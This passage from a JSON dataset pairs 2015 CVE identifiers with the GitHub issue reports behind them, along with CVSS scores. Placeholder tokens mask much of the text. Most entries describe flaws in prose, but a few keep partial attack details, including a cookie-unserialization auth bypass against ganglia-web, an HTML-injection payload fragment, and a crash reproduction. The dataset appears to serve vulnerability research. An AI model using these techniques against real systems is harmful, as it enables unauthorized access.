  439. "severity": "HIGH",
  440. "baseScore": 8.1,
  441. "impactScore": 5.9,
  442. "exploitabilityScore": 2.2
  443. },
  444. {
  445. "CVE_ID": "CVE-2015-6250",
  446. "Issue_Url_old": "https://github.com/claviska/simple-php-captcha/issues/16",
  447. "Issue_Url_new": "https://github.com/yasirmturk/simple-php-captcha/issues/16",
  448. "Repo_new": "yasirmturk/simple-php-captcha",
  449. "Issue_Created_At": "2015-07-30T23:02:28Z",
  450. "description": "Captcha bypass vulnerability. The FILETAG file has a vulnerability enabling a client to generate the captcha response automatically, effectively bypassing the captcha. Since APITAG is used both in the initial seed for the captcha and in the captcha url path sent to the client, it is possible to generate the captcha result automatically by running the same code client side. I can share a proof of concept privately if you need it. Just let me know how to reach you.",
  451. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  452. "severity": "MEDIUM",
  453. "baseScore": 5.3,
  454. "impactScore": 1.4,
  455. "exploitabilityScore": 3.9
  456. },
  457. {
  458. "CVE_ID": "CVE-2015-6521",
  459. "Issue_Url_old": "https://github.com/atutor/ATutor/issues/103",
  460. "Issue_Url_new": "https://github.com/atutor/atutor/issues/103",
  461. "Repo_new": "atutor/atutor",
  462. "Issue_Created_At": "2015-08-11T16:05:23Z",
  463. "description": "Persistent cross site scripting and file upload attacks possible in course management. Persistent cross site scripting and file upload attacks possible in course management Course management is lacking input validation in many places that allows stored XSS attacks and malicious file upload. Following are the vulnerable regions NUMBERTAG Create course: The course name is not validated that allows to inject a javascript query into the name field. Steps to reproduce: Instructor A creates a course with a script in course name as follows: APITAG APITAG Another script in banner. APITAG APITAG Login as admin. When you click on courses, the APITAG pops up. Every time the course profile is checked by the student, the APITAG also pops up. Severity is high as admin could be attacked NUMBERTAG File Upload in course There are illegal file extensions mentioned where all the executable files are checked. But a file without any extension is accepted. This could be a binary executable file. Filename It is possible to mount a javascript into this variable. Filename is not validated. File content An attacker can write a malicious script into the file content and upload. Steps to reproduce: Instructor A goes to his course and then go to file storage. Clicks on create a new file. The file name is given as : APITAG APITAG The file content is given as APITAG APITAG Now a APITAG logs in. As soon as a page displaying file name comes, the script APITAG gets popped up even without clicking on it. If the content is downloaded, the alert APITAG pops up. This is of very high severity as this allows an instructor to post a virus as a file upload. Every student gets attacked. Even the administrator while accessing the course get attacked if the attack is mounted. Solution: Against XSS: Input validation using APITAG Against file upload: Use a whitelist of extensions that are allowed to be uploaded rather than extensions that are not allowed.",
  464. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  465. "severity": "MEDIUM",
  466. "baseScore": 5.4,
  467. "impactScore": 2.7,
  468. "exploitabilityScore": 2.3
  469. },
  470. {
  471. "CVE_ID": "CVE-2015-6567",
  472. "Issue_Url_old": "https://github.com/wolfcms/wolfcms/issues/625",
  473. "Issue_Url_new": "https://github.com/wolfcms/wolfcms/issues/625",
  474. "Repo_new": "wolfcms/wolfcms",
  475. "Issue_Created_At": "2015-05-05T09:58:54Z",
  476. "description": "Security Issue: Unrestricted File Upload. Hello There Wolf CMS ! Greeting From Bhati While looking at your cms version NUMBERTAG i found that, an authenticated user can upload a malicious arbitrary file to server which allow him to take over the web server access like command execution where an user can act as server admin. Looking forward for your response so i can share the details with you ! it will better if we discuss in email so the information will not disclose here !",
  477. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  478. "severity": "HIGH",
  479. "baseScore": 8.8,
  480. "impactScore": 5.9,
  481. "exploitabilityScore": 2.8
  482. },
  483. {
  484. "CVE_ID": "CVE-2015-6816",
  485. "Issue_Url_old": "https://github.com/ganglia/ganglia-web/issues/267",
  486. "Issue_Url_new": "https://github.com/ganglia/ganglia-web/issues/267",
  487. "Repo_new": "ganglia/ganglia-web",
  488. "Issue_Created_At": "2015-09-04T17:31:37Z",
  489. "description": "APITAG auth bypass. It's easy to bypass auth by using boolean serialization like this: $ php r \"echo APITAG 'group'=>'admin', 'token'=>true)));\" Vulnerable code listed below: URLTAG APITAG { $cookie = $_COOKIE['ganglia_auth']; // magic quotes will break unserialization if($this APITAG { $cookie = stripslashes($cookie); } $data = unserialize($cookie); if(array_keys($data) != APITAG { return false; } if($this APITAG == $data['token']) { // Found by APITAG // Exploit: curl H APITAG APITAG URLTAG",
  490. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  491. "severity": "CRITICAL",
  492. "baseScore": 9.8,
  493. "impactScore": 5.9,
  494. "exploitabilityScore": 3.9
  495. },
  496. {
  497. "CVE_ID": "CVE-2015-6817",
  498. "Issue_Url_old": "https://github.com/pgbouncer/pgbouncer/issues/69",
  499. "Issue_Url_new": "https://github.com/pgbouncer/pgbouncer/issues/69",
  500. "Repo_new": "pgbouncer/pgbouncer",
  501. "Issue_Created_At": "2015-09-01T20:07:28Z",
  502. "description": "A failed auth_query lookup leads to connection as auth_user!. Per mailing list report ( URLTAG use of auth_user and auth_query works fine, until an invalid user is entered, in which case the login falls back to the auth_user. I traced this back to a problem in client.c, inside handle_auth_response. When we find a match from the query and parse it by seeing a 'D' packet, we set client >auth_user to the new entry. However, if not 'D' is seen, and we skip straight to 'C' and 'Z', the code sees the lack of a client >auth_user as an indication that the above failed. This is not true, however, as auth_user is already set (to the config auth_user value). Thus, getting no rows back from the auth_query lets one log in as the powerful auth_user user. Patch coming soon.",
  503. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  504. "severity": "HIGH",
  505. "baseScore": 8.1,
  506. "impactScore": 5.9,
  507. "exploitabilityScore": 2.2
  508. },
  509. {
  510. "CVE_ID": "CVE-2015-6961",
  511. "Issue_Url_old": "https://github.com/web2py/web2py/issues/731",
  512. "Issue_Url_new": "https://github.com/web2py/web2py/issues/731",
  513. "Repo_new": "web2py/web2py",
  514. "Issue_Created_At": "2015-01-26T21:11:01Z",
  515. "description": "Open Redirection Vulnerability. APITAG FILETAG on October NUMBERTAG Issue Open Redirection TO Any Domain Dependency For Successful Redirection We Need Administration Password Only Unauthenticated Users Are Affected , If an user is already authenticated on web2py then he will not get redirec , Apart from this , Users who are non authenticated like APITAG Users\" Will get redirection successfully\" Severity Medium ( According To Me ) =D Correct me if i am wrong Tested On Web2py Tester Version From Official Site Reported By Narendra Bhati APITAG Here i have tested this issue on Tested version provided by Web2py Official Site What steps will reproduce the problem NUMBERTAG FILETAG ( successful redirection tested on APITAG Version Of Web2py Latest Version NUMBERTAG Replace the password parameter value to your administration password NUMBERTAG After replacing the valid password enter any domain and you will ger redirected What is the expected output? What do you see instead? What version of the product are you using? On what operating system? Please provide any additional information below. APITAG issue: URLTAG",
  516. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  517. "severity": "MEDIUM",
  518. "baseScore": 6.1,
  519. "impactScore": 2.7,
  520. "exploitabilityScore": 2.8
  521. },
  522. {
  523. "CVE_ID": "CVE-2015-7225",
  524. "Issue_Url_old": "https://github.com/tinfoil/devise-two-factor/issues/45",
  525. "Issue_Url_new": "https://github.com/tinfoil/devise-two-factor/issues/45",
  526. "Repo_new": "tinfoil/devise-two-factor",
  527. "Issue_Created_At": "2015-09-10T12:40:07Z",
  528. "description": "Security Bug. Hi, Can you take a look at CVETAG ?",
  529. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
  530. "severity": "MEDIUM",
  531. "baseScore": 5.3,
  532. "impactScore": 3.6,
  533. "exploitabilityScore": 1.6
  534. },
  535. {
  536. "CVE_ID": "CVE-2015-7294",
  537. "Issue_Url_old": "https://github.com/vesse/node-ldapauth-fork/issues/21",
  538. "Issue_Url_new": "https://github.com/vesse/node-ldapauth-fork/issues/21",
  539. "Repo_new": "vesse/node-ldapauth-fork",
  540. "Issue_Created_At": "2015-05-22T02:14:37Z",
  541. "description": "Vulnerable to ldap injection. The username is not filtered as per ldap specifications so the code seems to be vulnerable to ldap injection: URLTAG",
  542. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  543. "severity": "HIGH",
  544. "baseScore": 7.5,
  545. "impactScore": 3.6,
  546. "exploitabilityScore": 3.9
  547. },
  548. {
  549. "CVE_ID": "CVE-2015-7384",
  550. "Issue_Url_old": "https://github.com/nodejs/node/issues/3138",
  551. "Issue_Url_new": "https://github.com/nodejs/node/issues/3138",
  552. "Repo_new": "nodejs/node",
  553. "Issue_Created_At": "2015-09-30T22:42:05Z",
  554. "description": "CVETAG Denial of Service Vulnerability. APITAG posted @ APITAG _ Description and CVSS Score A bug exists in FILETAG versions NUMBERTAG to NUMBERTAG whereby an external attacker can cause a denial of service. The severity of this issue is high (see CVSS scoring below) and users of the affected versions should plan to upgrade when a fix is made available. Versions NUMBERTAG and NUMBERTAG of FILETAG are not affected . Versions NUMBERTAG and NUMBERTAG of FILETAG are vulnerable . Versions NUMBERTAG and NUMBERTAG of FILETAG are not affected but remain unsupported and users of these versions are encouraged to migrate to FILETAG NUMBERTAG at their earliest convenience. Version NUMBERTAG of FILETAG is vulnerable and while FILETAG NUMBERTAG is unsupported, a patch release with a fix will be made available some time next week. Users of FILETAG NUMBERTAG are encouraged to migrate to FILETAG NUMBERTAG as a matter of priority. Full details of this vulnerability are embargoed until a new NUMBERTAG release is made available on Monday the NUMBERTAG th of October NUMBERTAG UTC. Common Vulnerability Scoring System (CVSS NUMBERTAG Base Score: | Metric | Score | | | | | Base Score NUMBERTAG APITAG | | Base Vector: | PATHTAG URLTAG | Attack Vector: | Network (AV:N) | | Attack Complexity: | Medium (AC:H) | | Privileges Required: | None (PR:N) | | User Interaction: | None (UI:N) | | Scope of Impact: | Unchanged (S:U) | | Confidentiality Impact: | None (C:N) | | Integrity Impact: | None (I:N) | | Availability Impact: | High (A:H) | Complete CVSS NUMBERTAG ector: PATHTAG URLTAG . Refer to the CVSS NUMBERTAG Specification URLTAG for details on the meanings and application of the vector components. CVETAG is listed on the MITRE CVE dictionary CVETAG and NIST NVD URLTAG . Action and updates A new NUMBERTAG release on Monday the NUMBERTAG th of October NUMBERTAG will be made available with appropriate fixes for this vulnerability along with disclosure of the details of the bug to allow for complete impact assessment by users. A new FILETAG NUMBERTAG release will be made on or after Monday the NUMBERTAG th of October NUMBERTAG for users having trouble migrating to FILETAG NUMBERTAG however this release does not indicate continued official support of FILETAG release lines. Contact and future updates Please contact EMAILTAG rg if you wish to report a vulnerability in FILETAG . Please subscribe to the low volume announcement only nodejs sec mailing list at URLTAG to stay up to date with security vulnerabilities in FILETAG and the projects maintained in the nodejs APITAG organisation URLTAG .",
  555. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  556. "severity": "HIGH",
  557. "baseScore": 7.5,
  558. "impactScore": 3.6,
  559. "exploitabilityScore": 3.9
  560. },
  561. {
  562. "CVE_ID": "CVE-2015-7510",
  563. "Issue_Url_old": "https://github.com/systemd/systemd/issues/2002",
  564. "Issue_Url_new": "https://github.com/systemd/systemd/issues/2002",
  565. "Repo_new": "systemd/systemd",
  566. "Issue_Created_At": "2015-11-23T18:16:34Z",
  567. "description": "Stack overflows in nss_mymachines ( CVETAG ). The getpwnam and getgrnam implementations in APITAG have stack overflows due to an unconstrained alloca call (hidden behind strndupa ). Example for getpwnam : [fweimer MENTIONTAG ~]$ grep mymachines APITAG passwd: files sss mymachines group: files sss mymachines hosts: files dns myhostname mymachines [fweimer MENTIONTAG ~]$ python3 c \"import pwd; APITAG NUMBERTAG Segmentation fault (core dumped) This has been assigned CVETAG for tracking purposes.",
  568. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  569. "severity": "CRITICAL",
  570. "baseScore": 9.8,
  571. "impactScore": 5.9,
  572. "exploitabilityScore": 3.9
  573. },
  574. {
  575. "CVE_ID": "CVE-2015-7529",
  576. "Issue_Url_old": "https://github.com/sosreport/sos/issues/696",
  577. "Issue_Url_new": "https://github.com/sosreport/sos/issues/696",
  578. "Repo_new": "sosreport/sos",
  579. "Issue_Created_At": "2015-12-04T16:25:23Z",
  580. "description": "CVETAG predictable tmp files usage. Mateusz Guzik reports that sos NUMBERTAG is vulnerable to symbolic link attacks since it uses predictable temporary file names in the configured APITAG location. If this location is shared with other users (the default on most distributions) then it is possible for a malicious user to obtain content from the archive and in some circumstances to execute arbitrary commands with administrative privileges. There are two recommended mitigations for these attacks: Use a private temporary directory (all versions, all kernels) Instead of using the default system temporary directory ( APITAG , APITAG ) use a private directory that excludes non administrative users from searching or reading the directory contents, e.g.: APITAG Note that the chmod is not strictly necessary assuming the root user's umask is set appropriately. Enable kernel link protection (partial mitigation, requires kernel support) Recent kernels support the APITAG feature that can be used to mitigate this class of attack and this is enable by default by most distributions that support the feature: ERRORTAG Note that relying on the APITAG feature does not entirely eliminate risk: an attacker could create a regular file that they own (in place of the output file sos expects to create) and use this to obtain archive content that would not normally be exposed to their user and group ID. Users of sosreport are recommended to use an alternate APITAG setting whenever possible. A fix for this problem is currently in master and will be included in the next sos release. This may be backported to earlier releases carried by distributions. Concerned users should contact their distribution's normal support channels for information regarding updated packages to fix this flaw.",
  581. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  582. "severity": "HIGH",
  583. "baseScore": 7.8,
  584. "impactScore": 5.9,
  585. "exploitabilityScore": 1.8
  586. },
  587. {
  588. "CVE_ID": "CVE-2015-7764",
  589. "Issue_Url_old": "https://github.com/Netflix/lemur/issues/117",
  590. "Issue_Url_new": "https://github.com/netflix/lemur/issues/117",
  591. "Repo_new": "netflix/lemur",
  592. "Issue_Created_At": "2015-10-06T20:52:39Z",
  593. "description": "Certificates encrypted with static IV. The IV is static per key at least. Lemur is using sqlalchemy_utils to encrypt certificates. This in turn encrypts with AES in CBC mode. URLTAG Given a single key, it will use the SHA NUMBERTAG hash of that key for all encryption. It looks like it will use the first NUMBERTAG bytes of that hash as the IV for each operation. I wanted to get your thoughts on it since setting up Lemur is my primary concern at the moment. Unless there's something I'm missing, I'll report it upstream as well.",
  594. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  595. "severity": "HIGH",
  596. "baseScore": 7.5,
  597. "impactScore": 3.6,
  598. "exploitabilityScore": 3.9
  599. },
  600. {
  601. "CVE_ID": "CVE-2015-7764",
  602. "Issue_Url_old": "https://github.com/kvesteri/sqlalchemy-utils/issues/166",
  603. "Issue_Url_new": "https://github.com/kvesteri/sqlalchemy-utils/issues/166",
  604. "Repo_new": "kvesteri/sqlalchemy-utils",
  605. "Issue_Created_At": "2015-10-06T20:56:40Z",
  606. "description": "APITAG uses static IV per key. APITAG uses AES in CBC mode. The IV that it uses is not random though. URLTAG Given a single key, it will use the SHA NUMBERTAG hash of that key for all encryption. It looks like it will use the first NUMBERTAG bytes of that hash as the IV for each operation. This link is a good primer on why this is bad: URLTAG",
  607. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  608. "severity": "HIGH",
  609. "baseScore": 7.5,
  610. "impactScore": 3.6,
  611. "exploitabilityScore": 3.9
  612. },
  613. {
  614. "CVE_ID": "CVE-2015-8026",
  615. "Issue_Url_old": "https://github.com/relan/exfat/issues/5",
  616. "Issue_Url_new": "https://github.com/relan/exfat/issues/5",
  617. "Repo_new": "relan/exfat",
  618. "Issue_Created_At": "2015-09-09T09:09:36Z",
  619. "description": "out of bounds write / heap overflow in exfatfsck in function APITAG This input file can trigger a heap overflow in exfatfsck: URLTAG This was found while fuzzing with the tool american fuzzy lop. Here is the stack trace from address sanitizer NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ef NUMBERTAG at pc NUMBERTAG b bp NUMBERTAG ffdeb0bf9d0 sp NUMBERTAG ffdeb0bf NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG ef NUMBERTAG thread T NUMBERTAG a in __interceptor_pread NUMBERTAG PATHTAG NUMBERTAG e NUMBERTAG f5 in verify_vbr_checksum PATHTAG NUMBERTAG e NUMBERTAG f5 in exfat_mount PATHTAG NUMBERTAG dd NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG f9f in __libc_start_main PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG ef NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG bdfd2 in __interceptor_malloc ( PATHTAG NUMBERTAG e NUMBERTAG in exfat_mount PATHTAG SUMMARY: APITAG heap buffer overflow NUMBERTAG interceptor_pread NUMBERTAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9df0: fa fa NUMBERTAG fa fa fa NUMBERTAG fa fa NUMBERTAG fa fa fd fd NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
  620. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  621. "severity": "HIGH",
  622. "baseScore": 7.8,
  623. "impactScore": 5.9,
  624. "exploitabilityScore": 1.8
  625. },
  626. {
  627. "CVE_ID": "CVE-2015-8080",
  628. "Issue_Url_old": "https://github.com/antirez/redis/issues/2855",
  629. "Issue_Url_new": "https://github.com/redis/redis/issues/2855",
  630. "Repo_new": "redis/redis",
  631. "Issue_Created_At": "2015-11-05T23:56:32Z",
  632. "description": "Integer overflow (leading to stack based buffer overflow) in embedded lua_struct.c. [re posting via github after private reporting, as agreed with antirez] Embedded copy of lua_struct.c suffers of an integer overflow in the APITAG parser that can be used to trigger (at least) a stack based buffer overflow. This affects all released versions of redis in both NUMBERTAG and NUMBERTAG branches. The following code is part of APITAG ERRORTAG APITAG can be tricked into an integer wraparound with a large size number as input, thus returning a negative value. APITAG has no lower bound/negative check; moreover, there is an implicit int > APITAG promotion, yielding a very large (unsigned) size value. This, plus further int / APITAG confusion in the whole module, results in stack based buffer overflows in other places, eg. APITAG reachable in LUA via APITAG . Simple APITAG as follow: APITAG Where NUMBERTAG is a user controlled index, larger than APITAG , fooling APITAG '>I' is there to reach a buffer overflow in APITAG NUMBERTAG is a user controlled input stored into value This will result in memory corruption due a user controlled write outside of a (stack based) array. Running the APITAG above, this can be observed from gdb: APITAG",
  633. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  634. "severity": "HIGH",
  635. "baseScore": 7.5,
  636. "impactScore": 3.6,
  637. "exploitabilityScore": 3.9
  638. },
  639. {
  640. "CVE_ID": "CVE-2015-8309",
  641. "Issue_Url_old": "https://github.com/devsnd/cherrymusic/issues/598",
  642. "Issue_Url_new": "https://github.com/devsnd/cherrymusic/issues/598",
  643. "Repo_new": "devsnd/cherrymusic",
  644. "Issue_Created_At": "2015-11-18T10:03:58Z",
  645. "description": "Security vulnerabilities discovered. Hi, Could you please get in touch with me to discuss NUMBERTAG ulnerabilities I've discovered in cherrymusic. feedersec [at] gmail [dot] com. Thanks.",
  646. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  647. "severity": "MEDIUM",
  648. "baseScore": 4.3,
  649. "impactScore": 1.4,
  650. "exploitabilityScore": 2.8
  651. },
  652. {
  653. "CVE_ID": "CVE-2015-8400",
  654. "Issue_Url_old": "https://github.com/shellinabox/shellinabox/issues/355",
  655. "Issue_Url_new": "https://github.com/shellinabox/shellinabox/issues/355",
  656. "Repo_new": "shellinabox/shellinabox",
  657. "Issue_Created_At": "2015-12-02T09:56:27Z",
  658. "description": "HTTP fallback via \"/plain\" allows opportunity for DNS rebinding attack. The shellinabox server, while using the HTTPS protocol, allows HTTP fallback through the \"/plain\" URL. This exposes the opportunity for a potential DNS rebinding attack, by malicious APITAG loaded in the context of the user browser, that would allow connection to shellinabox in the time window between server startup and user reconfiguration of default credentials (scenario is vanilla installation of, as an example, an embedded system). The \"/plain\" fallback should be disabled by default to improve security and mitigate such an attack. Credit goes to Stephen R\u00f6ttger from the Google Security Team for identifying the issue.",
  659. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N",
  660. "severity": "HIGH",
  661. "baseScore": 7.4,
  662. "impactScore": 4.0,
  663. "exploitabilityScore": 2.8
  664. },
  665. {
  666. "CVE_ID": "CVE-2015-8559",
  667. "Issue_Url_old": "https://github.com/chef/chef/issues/3871",
  668. "Issue_Url_new": "https://github.com/chef/chef/issues/3871",
  669. "Repo_new": "chef/chef",
  670. "Issue_Created_At": "2015-09-03T22:22:50Z",
  671. "description": "knife bootstrap leaks validator.pem private key into system logs. When you 'knife bootstrap' a node, the validator.pem private RSA key is leaked into the system logs PATHTAG The reason is that 'knife bootstrap' constructs a shell command to run on the node from a template, filling the private key in as a here doc (see URLTAG This command is invoked via (more or less): ssh node 'sudo sh c full command goes here' As a result, the private key ends up on the command line, in the process table, and, by way of sudo command logging on most reasonable systems, in the system logs. The logs may also be forwarded to other places (possibly in clear text), and possible stored on other systems, making the private validator key not quite so private any more.",
  672. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  673. "severity": "HIGH",
  674. "baseScore": 7.5,
  675. "impactScore": 3.6,
  676. "exploitabilityScore": 3.9
  677. },
  678. {
  679. "CVE_ID": "CVE-2015-8612",
  680. "Issue_Url_old": "https://github.com/blueman-project/blueman/issues/416",
  681. "Issue_Url_new": "https://github.com/blueman-project/blueman/issues/416",
  682. "Repo_new": "blueman-project/blueman",
  683. "Issue_Created_At": "2015-12-18T11:27:11Z",
  684. "description": "Privilege escalation in blueman DBUS API. Just saw this online: URLTAG Seems related to this: URLTAG",
  685. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  686. "severity": "HIGH",
  687. "baseScore": 8.4,
  688. "impactScore": 5.9,
  689. "exploitabilityScore": 2.5
  690. },
  691. {
  692. "CVE_ID": "CVE-2015-8618",
  693. "Issue_Url_old": "https://github.com/golang/go/issues/13515",
  694. "Issue_Url_new": "https://github.com/golang/go/issues/13515",
  695. "Repo_new": "golang/go",
  696. "Issue_Created_At": "2015-12-06T19:40:07Z",
  697. "description": "APITAG Incorrect results on NUMBERTAG bit platforms. CODETAG I get different results whether I run it in amd NUMBERTAG mode or NUMBERTAG mode CODETAG The first one is correct (you can verify this with python thus) CODETAG The playground also gives the incorrect results URLTAG .",
  698. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  699. "severity": "HIGH",
  700. "baseScore": 7.5,
  701. "impactScore": 3.6,
  702. "exploitabilityScore": 3.9
  703. },
  704. {
  705. "CVE_ID": "CVE-2015-8685",
  706. "Issue_Url_old": "https://github.com/Dolibarr/dolibarr/issues/4291",
  707. "Issue_Url_new": "https://github.com/dolibarr/dolibarr/issues/4291",
  708. "Repo_new": "dolibarr/dolibarr",
  709. "Issue_Created_At": "2015-12-24T17:52:10Z",
  710. "description": "HTML Injection in \"import external calendar\". Hi, You have a html injection in field \"url\" from the external calendar. You only need to edit the url parameter like: \">< h1>injection APITAG to see the html injection. Regards FILETAG",
  711. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  712. "severity": "MEDIUM",
  713. "baseScore": 6.1,
  714. "impactScore": 2.7,
  715. "exploitabilityScore": 2.8
  716. },
  717. {
  718. "CVE_ID": "CVE-2015-8702",
  719. "Issue_Url_old": "https://github.com/inspircd/inspircd/issues/1033",
  720. "Issue_Url_new": "https://github.com/inspircd/inspircd/issues/1033",
  721. "Repo_new": "inspircd/inspircd",
  722. "Issue_Created_At": "2015-04-16T07:59:42Z",
  723. "description": "Inspircd S2S UID command error from specific ISP. I am using inspircd NUMBERTAG and when a user connect from this ISP APITAG inspircd return the following error: ERRORTAG Protocol specification: APITAG User connection: CODETAG Visual comparation FILETAG You can see a white space between NUMBERTAG APITAG Why the hostname has white space? Is it possible inspircd bug? When this error occurred the two servers had a netsplit. Thanks by advance.",
  724. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
  725. "severity": "HIGH",
  726. "baseScore": 8.6,
  727. "impactScore": 4.0,
  728. "exploitabilityScore": 3.9
  729. },
  730. {
  731. "CVE_ID": "CVE-2015-8786",
  732. "Issue_Url_old": "https://github.com/rabbitmq/rabbitmq-management/issues/97",
  733. "Issue_Url_new": "https://github.com/rabbitmq/rabbitmq-management/issues/97",
  734. "Repo_new": "rabbitmq/rabbitmq-management",
  735. "Issue_Created_At": "2015-12-29T05:25:23Z",
  736. "description": "Validate (limit) user provided query parameters, e.g. lengths_age. APITAG and APITAG need to be validated and capped the same way page size is.",
  737. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  738. "severity": "MEDIUM",
  739. "baseScore": 6.5,
  740. "impactScore": 3.6,
  741. "exploitabilityScore": 2.8
  742. },
  743. {
  744. "CVE_ID": "CVE-2015-8851",
  745. "Issue_Url_old": "https://github.com/broofa/node-uuid/issues/108",
  746. "Issue_Url_new": "https://github.com/broofa/node-uuid/issues/108",
  747. "Repo_new": "broofa/node-uuid",
  748. "Issue_Created_At": "2015-03-23T22:52:46Z",
  749. "description": "crypto API isn't used in FILETAG context. After commit APITAG Node Crypto API isn't used anymore. I'm not sure if this is critical as NUMBERTAG is random or pseudo random based (RFC advise on usage of cryptographic quality random numbers but doesn't require it in any way). I'm not sure if this is something that planned to be fixed ( APITAG is significally faster and this may be a good reason to keep it that way and not to use Crypto API by default). As for now I'm using APITAG passing ERRORTAG as random generator.",
  750. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  751. "severity": "HIGH",
  752. "baseScore": 7.5,
  753. "impactScore": 3.6,
  754. "exploitabilityScore": 3.9
  755. },
  756. {
  757. "CVE_ID": "CVE-2015-8851",
  758. "Issue_Url_old": "https://github.com/broofa/node-uuid/issues/122",
  759. "Issue_Url_new": "https://github.com/broofa/node-uuid/issues/122",
  760. "Repo_new": "broofa/node-uuid",
  761. "Issue_Created_At": "2015-11-07T23:36:47Z",
  762. "description": "FILETAG SECURITY VULN: false === APITAG == 'function'). I've tested this on FILETAG NUMBERTAG and node.js NUMBERTAG Tested with npm install save node uuid MENTIONTAG Discovered this after posting a joke on twitter URLTAG and then decided to actually try replacing APITAG with an error throwing function to as part of a security audit on my software and its modules. ERRORTAG Should be ERRORTAG , pull requesting....",
  763. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  764. "severity": "HIGH",
  765. "baseScore": 7.5,
  766. "impactScore": 3.6,
  767. "exploitabilityScore": 3.9
  768. },
  769. {
  770. "CVE_ID": "CVE-2015-8863",
  771. "Issue_Url_old": "https://github.com/stedolan/jq/issues/995",
  772. "Issue_Url_new": "https://github.com/stedolan/jq/issues/995",
  773. "Repo_new": "stedolan/jq",
  774. "Issue_Created_At": "2015-10-18T17:07:03Z",
